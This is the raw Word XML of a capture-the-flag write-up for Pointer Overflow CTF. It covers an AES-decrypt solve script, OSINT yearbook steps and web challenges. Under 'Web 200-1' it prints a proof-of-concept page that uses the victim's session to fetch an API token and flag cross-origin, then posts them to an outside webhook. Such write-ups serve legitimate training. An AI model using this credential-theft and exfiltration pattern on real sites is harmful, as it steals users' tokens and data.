      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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64234D0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F0D2B3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"[*] UID:            {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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uid_bytes.hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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()}"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5CFED47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"[*] Obfuscated 'K': {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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otp_bytes.hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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()}"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4CE84E1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1CC552E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# Step 2: Compute 'H' by hashing the UID with SHA-256.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC63FC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hashlib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sha256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uid_bytes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digest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05C47CB7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"[*] Derived 'H':    {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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H.hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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()}"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DF12B81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81EE875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# Step 3: Compute the de-obfuscated keying material 'K' by XORing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C875E5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o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zip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otp_bytes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)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F9E2B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"[*] De-obfuscated 'K': {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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K.hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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()}"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443B881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50A0162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# Step 4: Split 'K' into the AES key and the IV, as per the author's instructions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE3E23E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[:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6BE3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16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706B55F6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iv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3A6BE3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16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:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CDBEDE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"\n[+] Recovered AES Key: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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key.hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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()}"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0203845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"[+] Recovered AES IV:  {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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iv.hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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()}"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F1B7EF0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CE1AF27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# Step 5: Decrypt the ciphertext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59094FA5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cipher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AES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AES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MODE_CBC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iv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5415D08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plaintext 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cipher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decrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ciphertext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79AF1EB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3FA16F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3A6BE3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># The ciphertext is 32 bytes, which is two full AES blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A20E9BB" w14:textId="77777777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"\n[+] Decryption successful!"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D58FB60" w14:textId="1540DFEF" w:rsidR="003A6BE3" w:rsidRPr="003A6BE3" w:rsidRDefault="003A6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068666"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6BE3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3A6BE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A6BE3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"    FLAG: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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plaintext.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A6BE3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().strip()}"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6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B1630EC" w14:textId="5027B58A" w:rsidR="00C3364E" w:rsidRDefault="00C3364E" w:rsidP="003A6BE3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D51F95" w14:textId="77777777" w:rsidR="002460A7" w:rsidRDefault="002460A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc213279042"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C018EAE" w14:textId="1F52E2D7" w:rsidR="006840C5" w:rsidRDefault="006840C5" w:rsidP="006840C5">
      <w:pPr>
        <w:pStyle w:val="Heading2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lastRenderedPageBreak/>
        <w:t>OSINT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="419D333E" w14:textId="77777777" w:rsidR="006840C5" w:rsidRPr="006840C5" w:rsidRDefault="006840C5" w:rsidP="006840C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72CB7975" w14:textId="6AACC2EE" w:rsidR="006840C5" w:rsidRDefault="006840C5" w:rsidP="006840C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc213279043"/>
      <w:r w:rsidRPr="006840C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">OSINT 200-1 The Paper </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006840C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Trail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AEF38FB" w14:textId="3DCF7757" w:rsidR="00BE7EAD" w:rsidRPr="007F2370" w:rsidRDefault="00BE7EAD" w:rsidP="00BE7EAD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7F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Get the coordinates from FLICKR.COM image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45058376" w14:textId="444667E7" w:rsidR="00BE7EAD" w:rsidRPr="007F2370" w:rsidRDefault="00BE7EAD" w:rsidP="00BE7EAD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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for close High Schools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A39252" w14:textId="08E1FA71" w:rsidR="00BE7EAD" w:rsidRPr="007F2370" w:rsidRDefault="00BE7EAD" w:rsidP="00BE7EAD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7F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Find Heritage, which used to be Home High School</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA59F97" w14:textId="728EC4AE" w:rsidR="00BE7EAD" w:rsidRPr="007F2370" w:rsidRDefault="00BE7EAD" w:rsidP="00BE7EAD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7F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Find their yearbook here </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="007F2370">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://homerhistorical.com/pages/yb.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19FFEB8A" w14:textId="30EC7946" w:rsidR="00BE7EAD" w:rsidRPr="007F2370" w:rsidRDefault="00BE7EAD" w:rsidP="00BE7EAD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7F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Go to 1940 yearbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE9825B" w14:textId="37E228D7" w:rsidR="00BE7EAD" w:rsidRPr="007F2370" w:rsidRDefault="00BE7EAD" w:rsidP="00BE7EAD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7F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On page 12 there is the quote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E5A092" w14:textId="123B5C55" w:rsidR="00FC07DB" w:rsidRDefault="00BE7EAD" w:rsidP="00BE7EAD">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7EAD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32C04717" wp14:editId="37CFC0DE">
            <wp:extent cx="1921266" cy="575734"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="2053085516" name="Picture 1" descr="A close-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5516" name="Picture 1" descr="A close-up of a piece of paper&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="50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09" cy="57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78B46" w14:textId="5CBD2230" w:rsidR="00BE7EAD" w:rsidRDefault="000E7944" w:rsidP="00BE7EAD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc213279044"/>
      <w:r w:rsidRPr="000E7944">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OSINT 400 Behave, Ye Strangers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="5C36A8B2" w14:textId="4E3AE118" w:rsidR="00BE7EAD" w:rsidRDefault="00BE7EAD" w:rsidP="00BE7EAD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7EAD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43DA237F" wp14:editId="4C0554ED">
            <wp:extent cx="2918647" cy="5054600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1185690048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90048" name="Picture 1" descr="A screenshot of a book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1198" cy="50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3909" w14:textId="77777777" w:rsidR="00BE7EAD" w:rsidRDefault="00BE7EAD" w:rsidP="00BE7EAD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4581A2D0" w14:textId="02602FEA" w:rsidR="007F2370" w:rsidRDefault="007F2370" w:rsidP="007F2370">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc213279045"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="194FD956" w14:textId="77777777" w:rsidR="007F2370" w:rsidRPr="006840C5" w:rsidRDefault="007F2370" w:rsidP="007F2370">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B2A571" w14:textId="6CC13A65" w:rsidR="007F2370" w:rsidRDefault="007F2370" w:rsidP="007F2370">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc213279046"/>
      <w:r w:rsidRPr="007F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">Web 100-4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Redirection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F2370">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Junction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FCBABAA" w14:textId="73858C98" w:rsidR="001C5089" w:rsidRPr="001C5089" w:rsidRDefault="001C5089" w:rsidP="001C5089">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220FAF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="656F9C87" wp14:editId="05D4C3E2">
            <wp:extent cx="4429743" cy="2505425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16006507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50776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E2DA" w14:textId="5F028E55" w:rsidR="00220FAF" w:rsidRPr="004C69B3" w:rsidRDefault="004C69B3" w:rsidP="001C5089">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc213279047"/>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web 200-1 What's Mine is Yours</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="28E39C1F" w14:textId="0F12CC0C" w:rsidR="004C69B3" w:rsidRDefault="004C69B3" w:rsidP="004C69B3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F2A9983" wp14:editId="1F169C5C">
            <wp:extent cx="3715268" cy="2648320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79981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14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5129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1. &lt;!doctype html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EE65F7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2. &lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA86EE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3. &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA715E7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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;meta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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>charset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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"utf-8"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110016AA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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;meta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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"viewport"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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"width=device-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>width,initial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-scale=1"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B721FC5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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;title&gt;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exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439A241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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;style&gt;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body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font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family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system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ui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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Segoe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UI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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Roboto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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Arial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margin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6666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1rem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white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space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pre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wrap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4C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621281B6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8. &lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0704B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 9. &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E073A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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;h3&gt;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Running minimal PoC — results below</w:t>
      </w:r>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67780F04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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;p&gt;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Make sure you are already signed into </w:t>
      </w:r>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;code&gt;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https://web200-1.pointeroverflowctf.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/code&gt;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 this browser/profile.</w:t>
      </w:r>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E4E938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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;pre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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id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sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"out"&gt;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starting…</w:t>
      </w:r>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD3B7D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841DE7E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>14. &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12018AFA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async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03D4E64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lastRenderedPageBreak/>
        <w:t xml:space="preserve">16.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outEl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document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getElementById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'out'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AF54DA9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log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=&gt;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outEl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textContent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"\n"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1FB1257D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9F7DEC2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529BB13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'https://web200-1.pointeroverflowctf.com'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CFAB8B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WEBHOOK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'https://microscopic-lighter-07.webhook.cool'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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// your webhook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E3FF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139CD7D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'1) GET /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api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/token (with credentials)'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18D0290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tRes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await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fetch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TARGET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'/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api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/token'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method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'GET'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credentials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'include'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mode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cors'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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A81318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  token fetch status: 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tRes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status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FF1762E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tText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await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tRes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text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1D4FA339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  token response text: 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tText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3357363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9860DB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let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C85466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JSON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parse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tText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catch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null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45AB8A6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76AB236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'No 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found — aborting.'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343AFD6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6BD8600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FCA7EF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'  extracted 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: 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676E40A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A172095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'2) POST /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api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/flag with X-Flag-Token header'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449E2D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38. </w:t>
      </w:r>
      <w:proofErr w:type="gram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fRes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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await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fetch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TARGET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'/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api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/flag'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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</w:p>
    <w:p w14:paraId="619170A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method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'POST'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239CC417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credentials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'include'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501B6A04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mode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cors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46BEF61E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headers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'X-Flag-Token'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'Accept'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'application/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json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6F4AE7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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D71090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  flag fetch status: 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fRes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status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CA3104C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fText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await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fRes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text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56B4FEFC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46.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  flag response text: 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fText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8A6FF68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47.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9A12E45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'3) Exfiltrate to webhook'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778DFB6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49. </w:t>
      </w:r>
      <w:proofErr w:type="gram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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="732B305E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50.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await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fetch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WEBHOOK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AEB6BAD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method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'POST'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148EAA7C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headers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'Content-Type'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'application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F1A55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body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JSON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stringify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({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A120D10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location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href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518C0504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55.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target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03A93B01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56.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token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apiToken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0E4952F5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57.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flagResponse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fText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2E004052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58.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timestamp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0066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date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toISOString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5AB04FEC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59.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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6EB2C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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A8DA09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61.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  exfiltration POST sent to webhook.'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FC1906B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62.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catch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FCE2A2B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63.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  exfiltration failed: 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3349089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64.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299943C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65.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8D8B20A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66.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'done.'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C330737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000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>catch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err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CA8C429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68.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log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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'error: '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err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err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stack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?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err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>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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err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717A4A69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69. </w:t>
      </w:r>
      <w:r w:rsidRPr="004C69B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B857F2C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 xml:space="preserve">70. </w:t>
      </w:r>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>})();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6CC3E1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>71. &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3632F" w14:textId="77777777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>72. &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F524F3" w14:textId="25CD3961" w:rsidR="004C69B3" w:rsidRPr="004C69B3" w:rsidRDefault="004C6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012859"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C69B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>73. &lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276F681E" w14:textId="6CA40284" w:rsidR="004C69B3" w:rsidRDefault="00856780" w:rsidP="004C69B3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc213279048"/>
      <w:r w:rsidRPr="00856780">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web 300-1 Friend of a Friend</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="394552F8" w14:textId="526A5FEF" w:rsidR="00856780" w:rsidRDefault="00856780" w:rsidP="00856780">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
